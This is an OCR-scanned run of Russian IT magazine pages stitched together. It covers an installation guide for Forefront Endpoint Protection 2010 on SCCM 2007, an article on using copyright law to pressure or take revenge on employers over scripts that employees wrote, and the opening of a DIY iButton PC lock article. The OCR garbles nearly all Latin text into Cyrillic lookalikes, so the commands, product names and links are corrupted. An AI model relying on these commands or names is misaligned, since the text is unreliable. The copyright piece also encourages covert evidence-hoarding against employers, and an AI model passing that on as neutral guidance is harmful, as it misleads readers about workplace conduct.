ми из этого шага последствиями. Если корпоративную 
версию Касперского или «Др. Веб» можно установить «на 
посмотреть» за полчасика, то в случае с РЕРтебя, воз- 
можно, ждет пара «веселых» дней :). 

Установка 5ССМ 2007 
КЗ на \А/іп2к8Р2 

РІесмотря на то, что сегодня уже можно попробовать РЕР 
2012, рассматривать мы будем стабильный релиз 2010. 
Для работы РЕР 2012 понадобится и 5ССМ 2012, который 
также находится в состоянии беты. Процесс установки 
их описан слабо и по ходу приходится решать много 
задач — и это несмотря на то, что он изначально зато- 
чен под ѴѴіп2к8Р2. Ну а что поделаешь, — бета. Отличия 



между ними по функциональности незначительны (по 
доступной на сегодня информации), единственное, что 
бросается в глаза — новый интерфейсЗССМ 2012, вы- 
полненный в стиле Оиііоок, более удобный и понятный в 
работе. Принцип работы остался тотже, поэтому освоить 
его после выхода стабильного релиза проблем не будет. 
Установку РЕР 2010 следует начинать с развертывания 
5ССМ 2007 РЗ, который вышел сразу после анонса РЕР. 
Так как РЗ доступен только в виде патча, вначале следует 
установить 5Р2, а затем накатить обновления. Процесс 
на примере 5ССМ 2007 5Р2 подробно описан в статье 
«РІачальниксети» в номере 08журнала ] [ за 2009 год). 
Правда, с выходом ѴѴіп2к8Р2 некоторые моменты даже 
упростились, но взамен мы получили очередную порцию 
«сюрпризов» :). Поэтому расскажу коротко. Все требова- 
ния ксерверным ОС остаются аналогичными 5ССМ 2007, 
то есть для сервера нам подходит ОС ѴѴі п2к35Р2/ѴѴіп2к8/ 
Н2 плюс потребуется ЗОЕ Зегѵег 2к53РЗ/2к8/Н2. Во время 
установки базы данных, необходимо активировать на ЗОЕ 
Апаіузіз Зегѵісез, Іпіедгаііоп Зегѵісез и Рерогііпд Зегѵісез. 
Последний нужен только для сервера отчетов, который 
может быть один на всех в сети. Причем здесьтех, кто 
хочетустановить«на посмотреть» ожидает неприятный 
сюрприз —триальная версия М550Е не поддержива- 
ется, годится только лицензионная Зіапсіагі/Епіегргізе. 

Об этом напрямую нигде в доках не сказано, просто в 
процессе проверки совместимости с ЗОИ-сервером 
мастер установки ЕЕР не обнаруживает сервисы Апаіузіз 
и Рерогііпд. Все сервисы М550Е, в частности ЗОЕЗегѵег 
Адепі следует перевести в режим автозапуска. 

В зависимости от конфигурации может понадобиться 
создатьЗРІМ (Зегѵісе Ргіпсіріе Ыате) для сервиса М550Е. 
Для этого в консоли вводим команду вида: 

>зе1:5рп -А М55(21_5ѵс/5гѵ01.ехатр1е.ог§:1433 
ехатр1е\т55д1зегѵег 
Ке§із1:егіп§ 5егѵісеРгіпсіра1І\Іате5 -Рог 
СМ=М5 5дІ5егѵег ,,СІ\І=ІІ5ег5.,0С=ехатр1е,,0С=ог§ 
М55(21_5ѵс/5гѵ01 . ехатріе . оп§ : 1433 
ІІрсІа1:есІ оЬдесІ: 

Как видишь, процесс несложен, нужнотолько разобрать- 
ся в данных, которые следует ввести, ведь если 5РІ\І для 
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учетной записи будет дублироваться, получим ошибку. В этом случае 
лучше удалить при помощи ключа «-б» все записи и добавить одну 
действительно необходимую. 

Обычно все данные можно получить, проанализировав логи. В моем 
случае это выглядело так: 



[ѴегЬозе] КебгіеѵесІ 5(2І_ зегѵег ассоипб: ІітЬегпаІ: 

' ЕХАМРЬЕХ тззяІБегѵег ' ; Ехбегпаі: ' ЕХАМРІ_Е\т55ЯІ ' 
[ѴегЬозе] КебгіеѵесІ 5РІ\І : М55(2І_5ѵс/5КѴ01 
[ѴегЬозе] Ѵа1іба1:іп§ 5РІМ. Ассоипі:: ЕХАМРІ_Е\т55дІ5егѵег . 
5РІМ: т55дІ5ѵс/5гѵ01 

Ставим компоненты на ѴѴіп2к8Р2: 



Р5> Ітрогіі-Мосіиіе зегѵегтапа§ег 

Р5> Абб-Іл(іпбоы5Реа1:иге ВІТ5 ^ КОС ^ ІлІеЬ -ІлІМІ „ ІлІеЬ -Раѵ- РиЬІізМіп^ 

Далее ставим 5ССМ 2007 5Р2 какобычно. Перед запуском установки 
ПЗ необходимо добавить хотфиксы КВ977384 ( зиррогЕті 
сот/кЬ/977384 ) и КВ2271 736 ( зиррогЕтісгозоП.сот/кЬ/2271 736 ). В 
процессе установки хотфикса мастер позволяет создать сразу и пакет 
обновления. 

Установка Рогеітопі 
Епфоіпі Ргоіесііоп 2012 

Теперь все готово для установки серверной части РЕР. Непосред- 
ственно перед развертыванием РЕР лучше всего воспользоваться 
анализатором соответствия рекомендациям Місгозоіі Еогеітопі 
Епброіпі Ргоіесііоп 2010 ( сІск.ги/6-ІѴ ). который покажет, насколько 
система готова кустановке РЕР. Соответствующий функционал есть 
и в программеустановки, но запускается он почти в самом конце. 

При установке клиентской части, будет проверено наличие антиви- 
русных программ других производителей, и если таковые найдут- 
ся, они будут автоматически деинсталлированы. Архив, который 
содержит клиента и расширения для 5ССМ под соответствующую 
платформу, и язык можно скачать с сайта М5. Послетого что мы 
пережили до этого, процесс инсталляции РЕР 2010 сложным назвать 
уже нельзя :). Просто запускаем мастер и следуем его указаниям. По 
ходу следует определиться стипом установки. Предлагается четыре 
варианта (кслову, в 2012такиеже пункты, только называются чуть 
по-другому): 

• Вазіс Іороіоду — устанавливается база данных, расширение сер- 
вера и консоли 5ССМ, компоненты сервера отчетов; 

• Вазіс ІороІодуѵѵІЬ гетоіе герогііпд баіабазе — тоже, что и пред- 
ыдущий, только мастер позволяетуказать альтернативный сервер 
отчетов; 




После установки серверной части РЕР, в консоли 5ССАА 
появляются новые пункты 




• Абѵапсеб Іороіоду — полностью настраиваемая установка, в ходе 
которой выбираются компоненты и задается произвольное раз- 
мещение базы отчетов, имена базы данных и т.д. 

• Іпзіаііопіу Сопбдигаііоп Мападег Сопзоіе Ехіепзіоп бог РЕР 201 0 — 
ставим только расширение консоли для 5ССМ 2007. 

Если нужно поставить вручную клиентскую часть, то выбираем 
Абѵапсеб бороіоду и снимаем все флажки. 

Теперь переходим к настройкам Рерогбпд Зегѵісез. Здесь потребует- 
ся ввести II РЕ сервиса и учетную запись с правами администратора 
домена. Причем мастер подставит ЕІ РЕ, но в формате рабочей груп- 
пы, нужно просто дополнить его полным РОБЫ сервиса. 

Как и прочие, продукт М5 ЕЕР может обновляться через ѴѴіпбоѵѵз 
Еірбаіе. Это лучший вариант, поэтому на следующем шаге масте- 
ра обязательно уста на вливаем соответствующий флажок. Далее 
определяемся сучастием в Місгозоіі ЗруЫеЕ Отказываться здесь 
не стоит. Поумолчанию предлагается вариант Вазіс, когда в М5 от- 
сылается минимум информации о файле. Его обычно предпочитают 
большинство пользователей, беспокоящихся о конфиденциально- 
сти, ведь в случае активации Абѵапсеб отправляются дополнитель- 
ные данные. Далее все стандартно. Указываем, куда ставить и ждем, 
пока отработает проверка зависимостей. В случае ошибки подсказку 
можноузнать, нажав ссылку рядом или просмотрев логи. Еще раз 
проверяем, что все указано правильно и ждем, пока закончится 
установка. Последним шагом мастер предложит проверить обнов- 
ления, лучше согласиться. Базы внутри пакета уже устарели, все 
равно придется потом активировать апдейт вручную. По окончании 
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в панели появится значок клиента РЕР, некоторое время он будет 
«приходить в себя» пока обновится и проверит систему, затем 
значоксменит цвет на зеленый, означающий, что все в порядке. Во 
время установки клиента будет применена дефолтовая политика, 
в некоторых случаях работа компонентов 8ССМ будет блокирована 
(как правило, подключение или процессы М88СИ) и потребуется в 
дальнейшем переопределить политику. Удобнее это сделать, создав 
коллекцию, в которой сервер 8ССМ будет единственной системой. 

В консоли 8ССМ в разделе Сотриіег Мападетепі появится меню 
Еогеігопі Епброіпі Ргоіесііоп, перейдя в которую мы увидим сводную 
информацию о статусе клиентов, систем защиты и политик. Все 
установки собраны в трех вкладках — Роіісіез (управление полити- 
ками), Аіегіз (настройка 4 групп уведомлений) и Рерогіз (отчеты). 
Плюс несколько подпунктов, начинающихся с РЕР-*, будут доступны 
в Сотриіег Мападетепі — ОезігесІ Сопіідигаііоп Мападетепі — 
Сопіідигаііоп Вазеііпез. Следующим шагом необходимо развер- 
нуть клиенты на удаленных системах. Способов существует много, 
в том числе несколько вариантов предлагает и 8ССМ. Разберем 
«штатный». Для начала следует создать коллекции, как это делается 
подробно описано все в той же статье «Начальник сети» (журнал ] 

[ 08.2009), описывать этот процесс сейчас смысла нет. Далее про- 
сто выбираем коллекцию и в контекстном меню пункт ОізІгіЬиІе 

— 8оІІѵѵаге. Запустится мастер, на втором шаге которого отмечаем 
8еІесІ ап ехізііпд раскаде и выбираем Місгозоіі Согрогаііоп РЕР 

— Оеріоутепі 1 .0. Далее следуем указаниям, хотя в большинстве 
случаев ничего, за исключением выбора применяемой политики, 
изменять не нужно. По умолчанию доступно две политики — для 
клиента и сервера, просто отмечаем наиболее подходящую. Все, 
клиентская часть будетустановлена на удаленных системах. Про- 
цесс будет показан на панели мониторинга, также можно сформиро- 
вать отчет, выбрав пункт Оеріоутепі Оѵегѵіеѵѵ. 

Настройка политик 

Конфигурация клиентов задается при помощи политик. Создать, 
изменить, копировать которые можно в подменю Роіісіез. Новая 
политика создается при помощи пошагового мастера, появляю- 
щегося при выборе ссылки ІЧеѵѵ Роіісу. На втором шаге следует 
определиться с типом политики. Доступны три варианта (стан- 
дартная для десктопов, повышенная защищенность и увеличен- 
ная производительность). Если политика создается для сервера, 
обращаемся к списку Роіісу Тетріаіе, где предлагается еще с 
десяток шаблонов. Далее дополнительно задаются тип и время 
сканирования, каталоги которых следует исключить при скани- 
ровании, ресурс с которого получает обновления(ІІІ\ІС, ѴѴ81І8 и 
ѴѴіпсІоѵѵз Іірсіаіе). В настройках клиента флажками активируется 




Мастер создания новой политики 
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Окно будущего 5ССМ 2012 



реалтайм-защита, сканирование и предупреждения. Все, политика 
создана. Чтобы изменить установки ѴѴіпсІоѵѵз Еігеѵѵаіі для выбран- 
ной политики, следует открыть окно ее свойств и перейти в соот- 
ветствующее окно. Новые политики получают больший приоритет, 
чтобы их изменить следует выбрать ссылку Ебіі Роіісу Ргесесіепсе и 
расставить их как нужно. 

Ряд проверок вроде принудительного сканирования дисков можно 
выполнить, выбрав компьютер в окне 8ССМ и вызвав его свойства. 

В качестве дополнительных инструментов для работы РЕР можно 
рекомендовать: 

• Пакетуправления безопасностью Еогеігопі Епброіпі Ргоіесііоп 
2010 8есигіІу Мападетепі Раск. 

• Пакетуправления наблюдением за работоспособностью сервера 
Еогеітопі Епброіпі Ргоіесііоп Зегѵег Неаііб Мопііогіпд Мападетепі 
Раск. 

• Средства Еогеігопі Епброіпі Ргоіесііоп 2010. 

Названия первых двух говорят сами за себя. Последний содержит 
ряд инструментов, позволяющих применять О РО для централизован- 
ного управления, предоставления оптимизированных параметров 
для каждой роли сервера и диагностики проблем. 

Заключение 

Учитывая интеграцию с 8ССМ, управление Еогеігопі Епброіпі 
Ргоіесііоп не является сверхсложной задачей. Клиентская часть 
достаточно функциональна, чтобы доверить ей защиту своих систем. 
И несомненно, что появлениетакого продукта, как ЕЕРдобавит кон- 
куренции в этом сегменте, от которой мы по-любому выиграем, тг 
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Ударь копирайтом 
по работодателю! 

Возвращаем финансы, честно заработанные 
на служебных произведениях 

Необязательно быть Михалковым, чтобы стать правообладателем. На самом деле, им может стать 
каждый из нас. Из этой статьи ты узнаешь, как программист, сисадмин или даже простой эникейщик 
может подставить своего работодателя, который не сумел (не захотел, не удосужился) должным обра- 
зом оформить авторские права на программы, скрипты и прочие коды, написанные работником. 



Палка о двух концах 

Даже шелл-скрипт из пяти строчек — это де-юре программа для ЭВМ 
и объект интеллектуальной собственности (ст. 1 225 и 1 259 ГК). Атот, 
кто его написал — автор (ст. 1 257). С монопольным правом распоря- 
жаться произведением и карающим мечом копирайта в ножнах. Вез- 
де, где хоть недолго поработал айтишник, остались «правовые мины» 
в виде созданных им объектов интеллектуальной собственности. 
Атеперь рассмотрим тонкую юридическую разницу между автором и 
правообладателем. 

Есть распространенное заблуждение, что, якобы, все, что находится 
на хозяйских компьютерах, принадлежитэтому хозяину. Разумеется, 
это не та к, не говоря уже о том, что информация или произведения/ 
программы не могут«принадлежать» кому-либо в принципе, ибо 
не являются объектами собственности (юристы говорят«вещной 
собственности», чтобы отличать ее от интеллектуальной собствен- 
ности). Согласно закону, «интеллектуальные права не зависят от 
права собственности на материальный носитель (вещь), в котором 
выражены соответствующие результаты интеллектуальной деятель- 
ности» (ст. 1 227 ГК). Это значит, что совершенно не важно, на чьем 
компьютере создана программа, важно лишь, кто ее написал. 

А какже трудовые отношения? Разве не принадлежит работодателю 
все то, что создано работником в рабочее время? Разумеется, нет. Это 
нетакдаже в отношении материальных объектов. А интеллектуальные 

— тем более отвязаны от вещей и территорий. Все это регулируется ста- 
тьей 1295 ГК. Кработодателю переходят права лишь нате программы 
(такназываемые служебные произведения), которые были написаны 
«в пределахустановленныхдля работника трудовых обязанностей». 

Эти обязанности должны быть прописаны в трудовом договоре или в 
должностной инструкции. Когда работник выполняет что-то сверх про- 
писанного, или когда официального перечня обязанностей вообще нет 

— нети «служебного произведения» — все остается у автора. 

Давайте рассмотрим примеры (см. таблицу). 

Думаю, из приведенных примеров идея понятна. То, что прямо не 
предусмотрено официальными трудовыми обязанностями, остается 
интеллектуальной собственностью автора. Даже если там кто-то 
успел написать «(с)» и название компании. 

Итак, работникчастенько является правообладателем своих программ. 
Но начальство, как правило, об этом не задумывается и рассуждает по- 
нятиями XIV века: «все, что на моей земле — мое». Такая юридическая 
дремучесть открывает возможности для умного человека. 

Кстати, если втвоем трудовом договоре написано что-нибудь про 
«авторские права», такие пункты, скорее всего, ничтожны. Потому 



что передать права на еще не созданное произведение можно лишь 
при очень определенных условиях, по договору авторского заказа 
(ст. 1 288 ГК), с конкретным описанием, что именно автор напишет для 
заказчика. А правами на неопределенное множество произведений, 
создаваемых в будущем вообще запрещено распоряжаться (п. 4 ст. 

1 233). Чтобы права перешли к работодателю, в договоре следует 
писать не о правах, а отрудовых обязанностях. 

Как подставить? 

Итак, внимательно прочитав трудовой договор и должностную 
инструкцию (которая, заметим к слову, должна быть работником 
подписана, иначе — опаньки, не считается), мы находим целый 
ряд программ, исключительные права на которые не перешли к 
работодателю. Программой для ЭВМ является как исходный текст 
на алгоритмическом языке (Си, Паскаль, Ассемблер), так и испол- 
няемый (объектный) код. Программой является шелл-скрипт, скрипт 
на встроенном/внутреннем языке какого-либо продукта (МЭСЖісе, 

1 С, Квейк). Также кобъектам авторских прав относятся написанные 
работником тексты, нарисованные им картинки, элементы дизайна, 
отснятые им фотографии — все, где есть хотя бы намек на творче- 
ство. К ним в полной мере применимо описанное в нашей статье. 
Такими «неслужебными» программами автор распоряжается 
полностью (п. 1 ст. 1 233), может разрешать и запрещать их исполь- 
зование, причем «отсутствие запрета не считается разрешением» 

(п. 1 ст. 1 229). Предприятие же, напротив, без разрешения а втора - 
правообладателя не вправе ни запустить, ни скопировать, ни 
переработать та кую программу. Запускают? Используют? Значит, 
нарушаюттвои исключительные* права. За нарушение исключи- 
тельных прав предусмотренотри вида ответственности: 

• Гражданская (несут как физически е, так и юридические лица); 

• Административная (только физлица); 

• Уголовная (только физлица). 

Вторая итретья взаимоисключающи, применяется лишь одна из 
них, взависимости от размера нарушения (порогсоставляетбО 
тысяч рублей). К гражданской ответственности можно привлекать 
независимо от других, последовательно или параллельно. 

Не грози всуе 

К сожалению, все эти виды ответственности хорошо работают 
лишь в руках юриста. Хорошая аналогия: апологеты и знатоки 
оружия всегда предупреждают, что нельзя угрожать стволом, если 
не готов убить оппонента. Некоторые даже договариваются до мар- 
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Формулировка из договора или 
должностной инструкции 


Является служебным 
произведением 


НЕ является служебным 
произведением 


«поддерживать функционирование 
компьютеров и иного коммуникационного 
оборудования» 


скрипт для резервного копирования 


программа для учета выделенных ІР-адресов 


«проводить техническое обслуживание 
вычислительной техники» 


— 


программа для платформы 1С по учету 
комплектующих 


«осуществлять защиту информации в 
информационной системе предприятия» 


сигнатура для Ю5 БпогІ 


БД для хранения логов коммутаторов 


«создать и обслуживать веб-сайт компании» 


біті-код сайта; составляющие сайта 
скрипты на РегІ, ^ѵа, ^ѵаБсгірІ, РНР и т.д. 


программа на Си для валидации біті-кода 


«разрабатывать ПО в соответствии с 
техническим заданием» 


код, написанный по официальному 
(утвержденному начальником и 
доведенному до исполнителей) ТЗ 


код, написанный по устному распоряжению 
начальника 


«проводить обучение слушателей/студентов» 


слайды/презентации к лекциям; вопросы 
для тестирования 


программа-оболочка для тестирования 


«создавать техническую документацию к 
выпускаемому оборудованию и ПО» 


техническая документация 


инсталлятор для обновления 
техдокументации 



гинальной формулировки «если достал — стреляй». Пустые угрозы 
и психологическую неготовность применить имеющееся оружие 
многие очень хорошо чувствуют. 

Поэтому и говорят, что оружие не повыситзащищенности того, кто 
слаб духом. Для виктимных людей оно лишь создаст дополнитель- 
ныеугрозы, не повысив шансов на победу. С юридическими про- 
цедурами примернотакже. Не стоитугрожать «подать в суд» или 
«посадить», когда не готов на самом деле ввязаться в гражданский 
процесс или уголовное дело. 

Психологической готовности тут недостаточно. Требуются еще 
некоторые знания или деньги на наемного юриста. Пустые юри- 
дические угрозы, не подкрепленные квалификацией и моральной 
готовностью, распознаются профессионалами на раз. И вызывают 
что угодно, но не испуг. 

Нашли в себе готовность? Или, может быть, есть деньги на адвоката? 
Тогда — вперед, начинаем защищать свои авторские права. 



Деньги 



В ряде случаев цель автора — не в причинении максимальных не- 
приятностей работодателю (бывшему работодателю), а в получении 
с него возможно большего количества денег. В этом случае начинать 
следуете переговоров. 

Для работника было бы ошибкой вести такие переговоры с неупол- 
номоченным сотрудником (например, с начальником департамента) 
в надежде, что тот потом передасттвои требования генеральному 
директору. Вряд ли. В бюрократической системе свои законы. Ин- 
формация (особенно, информация неприятная) там движется снизу 
вверх с огромным трудом и мизерными шансами достичь вершины. 

А вотсверху вниз — все идетсускорением и энтузиазмом. Поэтому 
запускать своютелегу следуете самого верха. 

Другая ошибка неискушенных правдоискателей — вести переговоры 
устно. И приниматьсколь-нибудьсерьезно слова и устные обещания. 
Поверивший хотя бы одному соглашению без бумаги с подписями и 
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Г ЗУИ/АСК 



Статья 1295. Служебное I Статья 1265. Право авторства 
произведение I и право автора на имя 

уу\м\м.соп$и11ап1.ги/рори1аг/аЫ4/79 2.ЫтІ#р668 Ш Ьа$е.аагапіги/10164072/70/#41265 



1. Авторские права на произведения науки, литературы или 
искусства, созданные в пределах установленных для работника 
(автора) трудовых обязанностей (служебное произведение), 
принадлежат автору. 

2 . Исключительное право на служебное произведение 
принадлежит работодателю, если трудовым или иным 
договором между работодателем и автором не предусмотрено 
иное. 

Если работодатель в течение трех лет со дня, когда служебное 
произведение было предоставлено в его распоряжение, 
не начнет использование этого произведения, не передаст 
исключительное право на него другому лицу или не сообщит 
автору о сохранении произведения в тайне, исключительное 
право на служебное произведение принадлежит автору. 

Если работодатель в срок, предусмотренный в абзаце 
втором настоящего пункта, начнет использование 
служебного произведения или передаст исключительное 
право другому лицу, автор имеет право на вознаграждение. 

Автор приобретает указанное право на вознаграждение и в 
случае, когда работодатель принял решение о сохранении 
служебного произведения в тайне и по этой причине не 
начал использование этого произведения в указанный срок. 
Размер вознаграждения, условия и порядок его выплаты 
работодателем определяются договором между ним и 
работником, а в случае спора — судом. 

3. В случае, когда в соответствии с пунктом 2 настоящей 
статьи исключительное право на служебное произведение 
принадлежит автору, работодатель вправе использовать такое 
произведение способами, обусловленными целью служебного 
задания, и в вытекающих из задания пределах, а также 
обнародовать такое произведение, если договором между 
ним и работником не предусмотрено иное. При этом право 
автора использовать служебное произведение способом, не 
обусловленным целью служебного задания, а также хотя бы и 
способом, обусловленным целью задания, но за пределами, 
вытекающими из задания работодателя, не ограничивается. 

Работодатель может при использовании служебного 
произведения указывать свое имя или наименование либо 
требовать такого указания. 

печатями автоматически получает в бюрократической среде ярлык 
чайника и лузера с соответствующим отношением в дальнейшем. Так 
что — только письменно, суведомлениями о доставке, подписями на 
втором экземпляре, протоколами переговоров ит.д. 

Переговоры следует начинать с письменного уведомления в адрес 
генерального директора о том, что предприятием используются 
(использовались) такие-то программы для ЭВМ, исключительные 
права на которые не перешли к работодателю, а остались у тебя. В 
соответствии с законодательством об авторском праве, ты жела- 
ешь получать вознаграждение за них и предлагаешь заключить 
лицензионный договор. Такая бумага не может быть сокрыта или 
проигнорирована, она будет поставлена на учет в канцелярии, 



1. Право авторства — право признаваться автором 
произведения и право автора на имя — право использовать 
или разрешать использование произведения под своим 
именем, под вымышленным именем (псевдонимом) или 
без указания имени, то есть анонимно, неотчуждаемы и 
непередаваемы, в том числе при передаче другомулицу или 
переходе к нему исключительного права на произведение 

и при предоставлении другомулицу права использования 
произведения. Отказ от этих прав ничтожен. 

2 . При опубликовании произведения анонимно или под 
псевдонимом (за исключением случая, когда псевдоним 
автора не оставляет сомнения в его личности) издатель (пункт 
1 статьи 1287), имя или наименование которого указано на 
произведении, при отсутствии доказательств иного считается 
представителем автора и в этом качестве имеет право 
защищать права автора и обеспечивать их осуществление. 

Это положение действует до тех пор, пока автор такого 
произведения не раскроет свою личность и не заявит о своем 
авторстве. 

получит резолюцию директора типа «разобраться, доложить» — и 
машина закрутится. 

Слишком многого не требуй. Понятно, что предприятию должно быть 
выгоднее приобрести лицензию, чем прекращать использование 
всехтвоих программ. Впрочем, даже в случае прекращения за «уже 
съеденное» придется уплатить. 

Месть 

Есть вариант внезапного нападения, без переговоров. Это на слу- 
чай, когда деньги автору не очень нужны. Тогда начать можно сразу с 
искового заявления в суд или заявления в прокуратуру о преступле- 
нии (ч. 2 и 3 ст. 146УК). 

Уголовный вариант применяется, если совокупи ость твоих про- 
грамм можетбыть оценена в сумму свыше 50 000 рублей. Оценка эта, 
по идее, должна производиться экспертом-оценщиком в рамках 
предварительного следствия. В России очень часто никакой оценки 
не проводится, а размер нарушения принимается следователем со- 
гласно голословному заявлению правообладателя. Но если ты — не 
«Майкрософт» и не «Коламбиа Пикчерз», не стоит рассчитывать на 
такое благоволение со стороны следствия и суда. Без независимой 
экспертной оценки стоимости твоих программ, скорее всего, не 
обойтись. Если 50 тысяч явно не наберется (сучетом общего коли- 
чества используемых экземпляров программ), уголовный вариант 
бесперспективен. 

Привлечение кадминистративной ответственности за нарушение 
исключительных прав (ст. 7.1 2 КоАП), когда размер нарушения ниже 
указанного порога — возможно. Но санкция за административное 
правонарушение предусмотрена настолько мелкая, что она врядли 
удовлетворит чувство мести обиженного программиста. Впрочем, сам 
факт привлечения к уголовной или административной ответствен- 
ности за нарушение авторских прав можно потом использовать при 
подаче гражданского иска. Это сильно облегчит доказывание факта. 
Для гражданского процесса требуется подготовка. Здесь, в отличие 
отуголовного, никакого предварительного следствия нет, а каждая 
сторона самостоятельно собирает доказательства. Но придется до- 
казать суду, ЧТО: 
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а) программа написана тобой; 

б) она использовалась на компьютерах предприятием; 

в) она использовалась в работе предприятия, а не для личных целей 
работников. 

Размерущерба доказывать не обязательно. Законодатель преду- 
смотрел два варианта: двойной размер стоимости программ или 
фиксированная сумма за каждый факт нарушения (ст. 1301 ГК). 
Хочешь — доказывай размер, если надеешься получить таким путем 
больше денег, хочешь — нет. 

То, что программа не является служебной, что права на нее не 
перешли и не были переданы работодателю, что автор не давал 
разрешения на использование — эти факты истец доказывать не 
обязан. Ответчик пусть попробует доказать обратное. 

Чем докажешь? 

Авторство (факт создания программы определенным человеком) 
можно подтвердить несколькими способами. Абсолютного до- 
казательства, непобиваемого и неоспариваемого, пожалуй, не 
существует. Не надо пытаться его искать. Парочка прямых, пусть и не 
стопроцентных доказательств плюс несколько косвенных — такого 
набора вполне достаточно, чтобы убедить судью. Противная сторона, 
скорее всего, не сможет представить ничего убедительного, чтобы 
опровергнуть твое авторство и доказать свое. 

Доказательствами авторства могут быть: 

• показания свидетелей, которые видели часть процесса создания 
программы, давали поручения относительно этой программы, про- 
сили ее дополнить или исправить; 

• показания соавторов и авторов отдельных модулей, библиотек, 
программ, с которыми налаживался обмен данными; 

• наличие у тебя исходников, которые отсутствуют у противной 
стороны; 

• депонирование программы в каком-либо авторитетном депозита- 
рии от твоего имени с как можно более ранней датой; 

• регистрация программы в «Роспатенте» в соответствии со ст. 1 262 ГК; 

• представление более ранних версий, черновиков, подготовитель- 
ных материалов, которых нету противной стороны (например, схема 
взаимосвязей функций программы или описание недокументиро- 
ванных возможностей); 

• включение в исходный текст или объектный код твоего имени 
стеганографическими методами; 

• служебная переписка и иные документы, где ты упомянут в каче- 
стве разработчика (например, заявки об обнаружении багов и твои 
ответы об их исправлении); 

• заключение эксперта о совпадении стиля написания и/или оформ- 
ления исходного текста программы с другими твоими программами, 
авторство которых не подвергается сомнению; 

• заверенная нотариусом дата на исходном тексте программы (это 
косвенное доказательство, доказывает л ишь то, что ты имел ис- 
ходный текст на такую-то дату); 

Понятно, что «неслужебные» программы пишутся, как правило, по 
инициативе работника. За депонированием версий, написанием 
документации никто не следит, техзадание не составляет, структуру 
БД не утверждает. В этихусловиях все черновики и сопутствующие 



документы оседаюту автора, а у работодателя — ничего. Не стирай 
их, лучше закатай в архив и унеси в безопасное место — это может 
пригодиться на случай будущего конфликта. 

Имя 

Кроме исключительных прав, автортакже имеет ряд прав неимуще- 
ственного характера, в частности, право на имя. Автор программы 
(все соавторы) имеет право указать свое имя или псевдоним на 
экземплярах этой программы. Оно неотчуждаемо и неотказуемо. Ты, 
конечно, можешь не пользоваться этим правом, но любой отказ от 
него недействителен. 

Ксожалению, закон не определяет, в каком виде и в каком месте 
должно бытьуказано имя автора. Для книг и фильмовтакое место 
определено традициями (обычаи делового оборота — ст. 10 ГК). Для 
компьютерных программ традиции не сложились. Возможно, потому, 
что в стране, производящей большинство программ, то есть, в США, 
правонаимяне является неотчуждаемым, программ ист там легко 
лишается этого права, подписав соответствующую бумагу. 

В России, какие бы обязательства ни подписывал работник, он 
может потом настаивать на указании себя в числе авторов. За на- 
рушение этого права предусмотрена гражданская ответственность 
(ст. 1251 ГК). 

Другое неимущественное право — право считаться автором — за- 
ключается втом, что ты можешь невозбранимо заявлять: «Я написал 
эту программу». Независимо оттого, кто ее использует, кому были 
переданы и потом перепроданы исключительные права на нее, кому 
на какихусловиях выдана лицензия. Понятно, что кслужебным про- 
граммам это также относится. Например, при составлении резюме 
или портфолио это право актуально. 

Образец для подражания 

Несмотря на то, что норма о служебных произведениях действует 
в России с 1 993 года, судебных прецедентов по ней было немного. 
Скорее всего, стороны предпочитают не доводить дело до судебной 
огласки и стараются урегулировать спор втиши кабинетов. 

Впрочем, один прецедент вашему покорному слуге известен. Я в нем 
участвовал в качестве посредника по просьбе автора — потенциаль- 
ного истца. 

Программист при увольнении из компании «А» не получил всех обе- 
щанных ему денег. Он выждал годик, пока продукт, в написании которо- 
го участвовал, был завершен. Затем его передали в эксплуатацию (ли- 
цензировали) крупной нефтегазовой корпорации «Т». И только после 
этого программист прислал к бывшему работодателю своего адвоката. 
Особенность ситуации втом, что формальным нарушителем авторских 
правтеперь являлся уже нетолько недобросовестный работодатель 
программиста «А», но и богатенький «Т»* **. Ответчиком можно было 
назначатьлюбого из них или обоих вместе. Оценивтакую перспективу, 
владелец компании «А» предпочел тихо расплатиться с нашим героем, 
лишьбы нефтегазовый заказчикнеузнал, какого юридического троян- 
ского коня ему продали подвидом программного продукта. 

В качестве постскриптума хочу напомнить, что в старину на Руси 
говорили: «С сильным не дерись, с богатым не судись». Что измени- 
лось стех пор в стране? Изменилось все. И ничего, ін: 



* «Исключительными правами» ныне именуется то, что раньше называлось более очевидным термином — «авторские имущественные права», то есть 
права на использование произведения, которые могут быть переданы другому и, следовательно, конвертированы в деньги. В отличие от них, «авторские 
неимущественные» (такие как право на имя, право на защиту произведения от искажений) являются моральными правами, не передаются и не 
превращаются в деньги. 

** Да, конечно, он не знал. Но в гражданском праве нет принципа вины. Ответственность может наступать и при отсутствии умысла (например, п. 3 ст. 1250 
ГК). Нарушал — плати. А потом можешь подавать так называемый регрессный иск к тому, кто действительно «знал» или «виноват». 
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РНРЕАКІЫО 



■ ■ Андрей «сісосіег» Чеснаков (сісосіег.таіігадтаіі.сот) 




Делаем электронный.замок 
для компа на ключах іВиНоп 



о Домофоны и сигнализации, 
использующие ключики ІВиНоп, 
можно встретить почти везде. 
Сделаем и мы простенький замок на 
этих ключах. Он, конечно, не умеет 
открывать огромные стальные 
двери, зато способен распознать 
свой ключ и включить компьютер. 



ЗАПИРАЕМ КОМП 
НА АМБАРНЫЙ ЗАМО 



Разбор полетов, постигаем теорию 

Во-первых, наше устройство должно уметь считывать код с домо- 
фонных таблеток. Думаю, тебе известно, что, как правило, работают 
они по протоколу 1-ѵѵіге. Есть несколько способов эмуляции этого 
протокола при помощи МК. Я использовал самый простой — дрыга- 
нье ножкой МК в такт протоколу. У этого способа, конечно, есть свои 
недостатки, но для нашего устройства они не критичны, ибо стано- 
вятся заметны только в том случае, когда М К должен параллельно 
с чтением ключа заниматься кучей другой работы (а у нас такого к 
счастью нет). 

Для того чтобы отличать свой ключ от чужого, устройство должно 
помнить код своего ключа. Для этого мы используем ЕЕРРОМ- 
память микроконтроллера. Ключ будем запоминать всего один, и на 
него понадобится 8 байт ЕЕРРОМ-памяти (если чуть обрезать фор- 
мат, то можно уложиться и в 6 байт). Чтобы обучить замок новому 
ключу на плате, в месте недоступном юзеру, сделаем кнопку «Іеагп», 
при нажатии на которую, микроконтроллер будет считывать ключ и 
записывать в энергонезависимую память. Если есть необходимость, 
ты можешь увеличить количество запоминаемых ключей, немного 
дописав программу. 

Когда компьютер выключен, замок должен питаться от какого-то 
внутреннего источника. Например, батарейки. Моя версия устрой- 
ства почти год работала от одной батарейки СР2032, а от пары 
мизинчиковых батареек ААА проработает намного дольше. Кстати, 
если замок будет размещен в корпусе компьютера, то можно попро- 
бовать подключиться к линии 5ѴѴ5В (фиолетовый провод) на БП 
